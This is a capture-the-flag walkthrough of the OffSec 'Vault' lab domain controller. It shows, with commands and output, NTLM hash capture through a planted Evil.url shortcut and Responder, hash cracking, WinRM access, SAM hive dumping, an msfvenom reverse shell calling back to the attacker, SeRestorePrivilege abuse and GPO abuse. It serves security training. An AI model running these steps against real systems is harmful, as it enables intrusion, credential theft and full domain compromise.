Initial Reconnaissance
We start with a basic scan to see which ports are open on the target (IP 192.168.240.172). For this, rustscan is a good quick-fire option:
rustscan -a 192.168.240.172Scan output:
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 125
88/tcp open kerberos-sec syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
389/tcp open ldap syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
464/tcp open kpasswd5 syn-ack ttl 125
593/tcp open http-rpc-epmap syn-ack ttl 125
636/tcp open ldapssl syn-ack ttl 125
3268/tcp open globalcatLDAP syn-ack ttl 125
3269/tcp open globalcatLDAPssl syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
9389/tcp open adws syn-ack ttl 125
49666/tcp open unknown syn-ack ttl 125
49668/tcp open unknown syn-ack ttl 125
49673/tcp open unknown syn-ack ttl 125
49674/tcp open unknown syn-ack ttl 125
49679/tcp open unknown syn-ack ttl 125
49703/tcp open unknown syn-ack ttl 125
49827/tcp open unknown syn-ack ttl 125Loads of open ports show up, and many of them point to services you’d expect on a Windows domain controller like Kerberos, LDAP, SMB, and RPC. This suggests we're probably up against a Domain Controller.
To dig deeper, I ran an nmap scan with service detection and OS fingerprinting across all TCP ports:
sudo nmap -A -sC -sV -T4 192.168.240.172 -p- --open -v -oN tcp_scan.nmapScan results:
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-23 23:02:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-23T23:03:05+00:00
|_ssl-date: 2025-04-23T23:03:45+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Issuer: commonName=DC.vault.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-22T22:58:29
| Not valid after: 2025-10-22T22:58:29
| MD5: 605f:ea38:3c3a:fcb6:e6bd:3808:4d72:8a53
|_SHA-1: dd3e:f566:e04d:1f7b:57b1:ccd1:ee78:93a4:015d:ebdc
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49827/tcp open msrpc Microsoft Windows RPC
From the output, we learn:
- It's running Active Directory under the domain
vault.offsec. - The host is named
DCand provides plenty of Windows domain-related services. - Port
3389(RDP) is open, as well as5985(WinRM), meaning we could try remote access later on.
To cover more ground, I scanned the top 1000 UDP ports too:
nmap -A -sV -sC -sU 192.168.240.172 --script=*enum -oN udp_scan.nmapNext, I mapped the domain name to the IP in my /etc/hosts file to make future commands easier:
sudo nano /etc/hosts192.168.240.172 vault.offsec DC.vault.offsecEnumeration
DNS
Tried a zone transfer using dig, which can reveal internal hosts if DNS is misconfigured:
dig @192.168.240.172 axfr vault.offsec┌──(kali㉿kali)-[~/Vault]
└─$ dig @192.168.240.172 axfr vault.offsec
; <<>> DiG 9.20.4-4-Debian <<>> @192.168.240.172 axfr vault.offsec
; (1 server found)
;; global options: +cmd
; Transfer failed.No luck – the transfer failed (as expected in most hardened environments).
Kerberos
Used the krb5-enum-users NSE script in nmap to try enumerating valid usernames:
nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} 192.168.240.172
nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="vault.offsec",userdb='/home/kali/Desktop/wordlists/seclists/Usernames/Names/names.txt' 192.168.240.172┌──(kali㉿kali)-[~/Vault]
└─$ nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} 192.168.240.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 19:15 EDT
Nmap scan report for vault.offsec (192.168.240.172)
Host is up (0.12s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
|_krb5-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds┌──(kali㉿kali)-[~/Vault]
└─$ nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="vault.offsec",userdb='/home/kali/Desktop/wordlists/seclists/Usernames/Names/names.txt' 192.168.240.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 19:15 EDT
Nmap scan report for vault.offsec (192.168.240.172)
Host is up (0.12s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
Nmap done: 1 IP address (1 host up) scanned in 0.51 secondsNo valid users came back, but this method can be useful if a domain leaks usernames via Kerberos pre-auth.
We could try to get service tickets, but we get stopped by a password prompt.
impacket-GetUserSPNs -request -dc-ip 192.168.240.172 vault.offsec/svc_tgs┌──(kali㉿kali)-[~/Vault]
└─$ impacket-GetUserSPNs -request -dc-ip 192.168.240.172 vault.offsec/svc_tgs
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies
Password:LDAP
We might be able to query the LDAP service and pull some useful information. It’s a good idea to save the output to a file, since a successful result can generate a large amount of data. Having it stored makes it easier to search through later using the terminal or a text editor.
ldapsearch -H ldap://192.168.240.172 -x -b"DC=vault,DC=offsec" > ldap_dump.txt┌──(kali㉿kali)-[~/Vault]
└─$ cat ldap_dump.txt
# extended LDIF
#
# LDAPv3
# base <DC=vault,DC=offsec> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1RPC and SMB
Use rpcclient to attempt anonymous access to the Remote Procedure Call (RPC) service on the target machine.
rpcclientis a tool from the Samba suite used to interact with Windows RPC services.U ''sets the username to blank, meaning you're trying to log in without a user account (i.e., anonymously).Ntells it not to prompt for a password (null session).192.168.240.172is the IP of the target (presumably a Domain Controller).
rpcclient -U '' -N 192.168.240.172 ┌──(kali㉿kali)-[~/Vault]
└─$ rpcclient -U '' -N 192.168.240.172
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIEDI tried connecting to SMB anonymously:
smbclient -L 192.168.240.172 -N┌──(kali㉿kali)-[~/Vault]
└─$ smbclient -L 192.168.240.172 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DocumentsShare Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.240.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableWe got a list of shares and the one called DocumentsShare stood out as it’s not a standard system share.
Attempted to access it:
smbclient //192.168.240.172/DocumentsShare
It appeared empty, but we had write access. We tested this by uploading a file:
echo 'this is a test' > test.txtput test.txt
Capturing NTLM Hashes with Responder
We will use a tool called Responder to capture NTLM credentials by tricking the system into reaching out to our machine. To do this, we’ll create a specially crafted icon shortcut file that triggers a connection back to us.
Let’s start by creating that file. Copy the following content into a new file named Evil.url:
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\<YOUR tun0 IP>\%USERNAME%.icon
IconIndex=1For example:
┌──(kali㉿kali)-[~/Vault]
└─$ cat Evil.url
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\192.168.45.230\%USERNAME%.icon
IconIndex=1Start Responder on the attacking machine to listen for SMB authentication:
sudo responder -I tun0 -wv Upload Evil.url to the SMB share.
smb: \> put Evil.url
putting file Evil.url as \Evil.url (0.3 kb/s) (average 0.2 kb/s)
smb: \> ls
. D 0 Wed Apr 23 19:34:46 2025
.. D 0 Wed Apr 23 19:34:46 2025
Evil.url A 125 Wed Apr 23 19:34:46 2025
test.txt A 15 Wed Apr 23 19:31:29 2025
7706623 blocks of size 4096. 712123 blocks available
When a user opens that share in Explorer, their system tries to load the icon, leaking NTLM credentials. From Responder, we captured a hash for the user VAULT\anirudh.
[SMB] NTLMv2-SSP Client : 192.168.240.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash : anirudh::VAULT:8f0986f9b93c25a8:DD6B8898008205CAF1F53A11DEA431DA:0101000000000000806FD4B486B4DB0196F1F34D50DBB63E000000000200080046004E004700490001001E00570049004E002D004D005300370041005600350056004F00590035005A0004003400570049004E002D004D005300370041005600350056004F00590035005A002E0046004E00470049002E004C004F00430041004C000300140046004E00470049002E004C004F00430041004C000500140046004E00470049002E004C004F00430041004C0007000800806FD4B486B4DB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200330030000000000000000000
If you want to dive deeper into how this technique works, you can check out the full explanation at https://github.com/Greenwolf/ntlm_theft.
Cracking the Hash
Next, take the captured NTLMv2 hash from Responder and save it into a text file. This will allow us to try cracking it with a password list.
┌──(kali㉿kali)-[~/Vault]
└─$ cat hash.txt
anirudh::VAULT:8f0986f9b93c25a8:DD6B8898008205CAF1F53A11DEA431DA:0101000000000000806FD4B486B4DB0196F1F34D50DBB63E000000000200080046004E004700490001001E00570049004E002D004D005300370041005600350056004F00590035005A0004003400570049004E002D004D005300370041005600350056004F00590035005A002E0046004E00470049002E004C004F00430041004C000300140046004E00470049002E004C004F00430041004C000500140046004E00470049002E004C004F00430041004C0007000800806FD4B486B4DB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200330030000000000000000000Use john to crack the hash:
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 hash.txt┌──(kali㉿kali)-[~/Vault]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM (anirudh)
1g 0:00:00:10 DONE (2025-04-23 19:39) 0.09775g/s 1037Kp/s 1037Kc/s 1037KC/s Seifer@14..Sda10184
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 
We will add the credentials to our notes.
anirudh:SecureHMRemote Access with RDP and WinRM
We have got a couple of options for remote access. We could try using WinRM, which is Windows Remote Management over port 5985, or see if the credentials work with Remote Desktop on port 3389.
Using the nxc, try RDP using the discovered credentials.
nxc rdp 192.168.240.172 -u anirudh -p SecureHM┌──(kali㉿kali)-[~/Vault]
└─$ nxc rdp 192.168.240.172 -u anirudh -p SecureHM
RDP 192.168.240.172 3389 DC [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC) (domain:vault.offsec) (nla:False)
RDP 192.168.240.172 3389 DC [+] vault.offsec\anirudh:SecureHM 
This worked and will likely give us GUI access.
xfreerdp /cert:ignore /dynamic-resolution +clipboard /u:'anirudh' /p:'SecureHM' /v:vault.offsecThe command options are pretty straightforward — they tell the client to ignore certificate warnings, adjust the display size to match the window, and enable clipboard sharing.
It’s also a good idea to test this with rdesktop as well, since it can behave a bit differently.
rdesktop -u 'anirudh' -p 'SecureHM' -g 85% -D DC.vault.offsec
We’re seeing an error saying “The username and password is incorrect,” which means RDP access isn’t working. Since that’s a no-go, our next step is to try enumeration using tools like crackmapexec or nxc instead.
nxc winrm 192.168.240.172 -u anirudh -p SecureHM┌──(kali㉿kali)-[~/Vault]
└─$ nxc winrm 192.168.240.172 -u anirudh -p SecureHM
WINRM 192.168.240.172 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:vault.offsec)
WINRM 192.168.240.172 5985 DC [+] vault.offsec\anirudh:SecureHM (Pwn3d!)
We’ve successfully connected to the machine via WinRM. The tool reports ‘Pwn3d’, which usually means we’ve got Administrator-level access, although CrackMapExec isn’t always accurate with that.
Now it’s time to take a closer look inside the system.
evil-winrm -i 192.168.240.172 -u anirudh -p SecureHM┌──(kali㉿kali)-[~/Vault]
└─$ evil-winrm -i 192.168.240.172 -u anirudh -p SecureHM
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> ls
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh
User Flag
The user flag is located in the anirudh’s Desktop:
*Evil-WinRM* PS C:\Users\anirudh\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\anirudh\Desktop> ls
Directory: C:\Users\anirudh\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2025 4:29 PM 34 local.txt
*Evil-WinRM* PS C:\Users\anirudh\Desktop> cat local.txt
d9baa4d1dafeec7bd27573cebb7dda9f
*Evil-WinRM* PS C:\Users\anirudh\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DC
Primary Dns Suffix . . . . . . . : vault.offsec
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : vault.offsec
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-AB-6F-40
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 192.168.240.172(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.240.254
DNS Servers . . . . . . . . . . . : 192.168.240.254
NetBIOS over Tcpip. . . . . . . . : Enabled
Privilege Escalation
Option 1: Dump Local Hashes (Not Successful)
Check user privileges:
whoami /priv*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone EnabledEven though this isn’t the Administrator account, we still have quite a bit of control. Privileges like SeBackupPrivilege, SeRestorePrivilege, and SeMachineAccountPrivilege are all promising avenues for escalation.
The SeBackupPrivilege stands out in particular. It lets us copy protected files like the SAM and SYSTEM hives, which store password hashes for local accounts. That’s a solid starting point.
Let’s give it a go by saving copies of those files to a directory we have access to.
reg save hklm\sam C:\users\anirudh\sam.hive
reg save hklm\system C:\users\anirudh\system.hive
Use Evil-WinRM’s built-in download command to retrieve the files. They’ll be saved to the same directory on your local machine where you originally launched the Evil-WinRM session.
download sam.hive
download system.hive
Once you've downloaded the files, you can analyse them using impacket-secretsdump to extract the password hashes.
impacket-secretsdump -system system.hive -sam sam.hive LOCAL┌──(kali㉿kali)-[~/Vault]
└─$ impacket-secretsdump -system system.hive -sam sam.hive LOCAL
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... 
These hashes belong to local users, not domain accounts. Still, if we manage to access the system as the local Administrator, we’ll have everything we need regardless.
Let’s now check whether local administrators are allowed to connect via RDP and WinRM.
net localgroup 'Remote Desktop Users'
net localgroup 'Remote Management Users'*Evil-WinRM* PS C:\Users\anirudh> net localgroup 'Remote Desktop Users'
Alias name Remote Desktop Users
Comment Members in this group are granted the right to logon remotely
Members
-------------------------------------------------------------------------------
The command completed successfully.
*Evil-WinRM* PS C:\Users\anirudh> net localgroup 'Remote Management Users'
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
anirudh
The command completed successfully.It looks like only our current user has permission to access the system remotely.
We gave impacket-psexec a go using the Administrator’s hash, but it didn’t work:
┌──(kali㉿kali)-[~/Tools]
└─$ impacket-psexec -hashes 00000000000000000000000000000000:608339ddc8f434ac21945e026887dc36 administrator@192.168.240.172
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.Option 2: Scheduled Task Enumeration (Not Successful)
Let’s run winPEAS to see what useful information it can find. You’ll need to upload it using Evil-WinRM’s built-in upload command. Make sure the file is in the same directory where you started Evil-WinRM.
upload winpeas.exe
There are interesting findings:
ÉÍÍÍÍÍÍÍÍÍ͹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
(ExplorerShellUnelevated) CreateExplorerShellUnelevatedTask: C:\Windows\Explorer.EXE /NOUACCHECK
Trigger: When the task is created or modified
=================================================================================================
(VAULT\anirudh) Killexplorer: powershell.exe C:\Users\anirudh\KillExplorer.ps1
Permissions file: anirudh [AllAccess]
Permissions folder(DLL Hijacking): anirudh [AllAccess]
Trigger: At 1:05 AM on 11/19/2021-After triggered, repeat every 00:05:00 indefinitely.
We don’t have direct access to view all the scheduled tasks, but there’s still a chance we can modify one. Let’s take a closer look at what’s available.
Get-ScheduledTask
schtasks*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-ScheduledTask
Cannot connect to CIM server. Access denied
At line:1 char:1
+ Get-ScheduledTask
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (MSFT_ScheduledTask:String) [Get-ScheduledTask], CimJobException
+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-ScheduledTask
*Evil-WinRM* PS C:\Users\anirudh\Documents> schtasks
Program 'schtasks.exe' failed to run: Access is deniedAt line:1 char:1
+ schtasks
+ ~~~~~~~~.
At line:1 char:1
+ schtasks
+ ~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
cd C:\windows\system32\tasks
ls*Evil-WinRM* PS C:\windows\system32\tasks> ls
Directory: C:\windows\system32\tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 12:19 AM Microsoft
-a---- 1/18/2022 11:05 AM 3652 CreateExplorerShellUnelevatedTask
-a---- 11/19/2021 1:12 AM 3450 Killexplorer
-a---- 11/19/2021 1:05 AM 3576 ShareCheck
-a---- 11/18/2021 8:25 PM 4178 User_Feed_Synchronization-{F800F482-DEE6-4DB5-AB71-CE8AABB98DF2}
We’ve come across the Killexplorer task again. The associated PowerShell script is sitting in our user’s home directory. Let’s take a look at what it does. Ideally, we’re after a scheduled task that runs with SYSTEM-level privileges.
type Killexplorer*Evil-WinRM* PS C:\windows\system32\tasks> type Killexplorer
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2021-11-19T01:05:54</Date>
<Author>VAULT\anirudh</Author>
<URI>\Killexplorer</URI>
<SNIP>
This task runs under our current user account. Let’s also check what the script actually does.
type C:\Users\anirudh\KillExplorer.ps1*Evil-WinRM* PS C:\Users\anirudh\Documents> type C:\Users\anirudh\KillExplorer.ps1
$shell=New-Object -ComObject Shell.Application
$window = $shell.Windows() | Where-Object { $_.LocationURL -like "$(([uri]"C:\DocumentsShare").AbsoluteUri)*" }
$window | ForEach-Object { $_.Quit() }
This suggests the scheduled task was originally designed to close a particular Explorer window, probably as part of an automated clean-up process.
Option 3: Abuse SeRestorePrivilege (Pwned)
Looking into ways we can escalate privileges using the rights we have led to a GitHub tool here:
https://github.com/dxnboy/redteam/blob/master/SeRestoreAbuse.exe
Next, we’ll create a malicious reverse shell payload using msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.230 LPORT=80 -f exe -o reverse.exe┌──(kali㉿kali)-[~/Tools]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.230 LPORT=80 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exeUse Evil-WinRM’s upload command to transfer both SeRestoreAbuse.exe and reverse.exe to the target.
upload SeRestoreAbuse.exe
upload reverse.exe*Evil-WinRM* PS C:\Users\anirudh\Documents> upload SeRestoreAbuse.exe
Info: Uploading /home/kali/Tools/SeRestoreAbuse.exe to C:\Users\anirudh\Documents\SeRestoreAbuse.exe
Data: 22528 bytes of 22528 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\anirudh\Documents> upload reverse.exe
Info: Uploading /home/kali/Tools/reverse.exe to C:\Users\anirudh\Documents\reverse.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
Set up a listener on your machine to catch the reverse shell. It’s a good idea to use rlwrap so you retain arrow key functionality in the shell session.
sudo rlwrap nc -nvlp 80Next, run SeRestoreAbuse.exe. It’s best practice to use the full absolute path when executing it to avoid any path-related issues.
.\SeRestoreAbuse.exe C:\Users\anirudh\Documents\reverse.exe
Now switch back to your listener and keep an eye out. If everything worked, you should see a connection coming through.
┌──(kali㉿kali)-[~]
└─$ sudo rlwrap nc -nvlp 80
[sudo] password for kali:
listening on [any] 80 ...
connect to [192.168.45.230] from (UNKNOWN) [192.168.240.172] 49940
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Option 4: GPO Abuse (Pwned)
Go ahead and upload PowerView.ps1 using the upload command in Evil-WinRM.
upload PowerView.ps1
Run the PowerView script to load its functions, then use it to retrieve details about the Default Domain Policy. This will help us check if we can make changes to it.
.\powerview.ps1
Get-GPO -Name "Default Domain Policy"*Evil-WinRM* PS C:\Users\anirudh\Documents> .\PowerView.ps1
*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-GPO -Name "Default Domain Policy"
DisplayName : Default Domain Policy
DomainName : vault.offsec
Owner : VAULT\Domain Admins
Id : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 11/19/2021 12:50:33 AM
ModificationTime : 11/19/2021 2:00:32 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 4, SysVol Version: 4
WmiFilter :
Let’s check what level of access our user has on the Default Domain Policy by running:
Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh
Trustee : anirudh
TrusteeType : User
Permission : GpoEditDeleteModifySecurity
Inherited : False
Looks like we’ve got full control over the GPO which means we can do just about anything!
We’re going to take advantage of this by adding our user to the local administrators group via the GPO, then force a policy update to apply the change.
To make this easier, download SharpGPOAbuse.exe from the following repo:
https://github.com/byronkg/SharpGPOAbuse
Once you’ve got it, upload the executable to your active Evil-WinRM session.
upload SharpGPOAbuse.exe
Next, run the tool with the following command to add our current user to the local administrators group via the Default Domain Policy:
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"*Evil-WinRM* PS C:\Users\anirudh\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
[+] Domain = vault.offsec
[+] Domain Controller = DC.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=vault,DC=offsec
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
Now let’s manually trigger a group policy update to apply the changes straight away:
gpupdate /force*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Let’s confirm the change by checking the members of the local administrators group:
net localgroup administrators*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.
Root Flag
The root flag is located in the Administrator’s Desktop
C:\Windows\system32>cd C:\Users\Administrator
cd C:\Users\Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C30-DCD7
Directory of C:\Users\Administrator\Desktop
11/19/2021 02:10 AM <DIR> .
11/19/2021 02:10 AM <DIR> ..
04/23/2025 06:35 PM 34 proof.txt
1 File(s) 34 bytes
2 Dir(s) 3,674,705,920 bytes free
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
2ba03b9720ca9b9661ec8c92cc48ef49
C:\Users\Administrator\Desktop>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DC
Primary Dns Suffix . . . . . . . : vault.offsec
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : vault.offsec
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-AB-7E-5A
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 192.168.240.172(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.240.254
DNS Servers . . . . . . . . . . . : 192.168.240.254
NetBIOS over Tcpip. . . . . . . . : Enabled
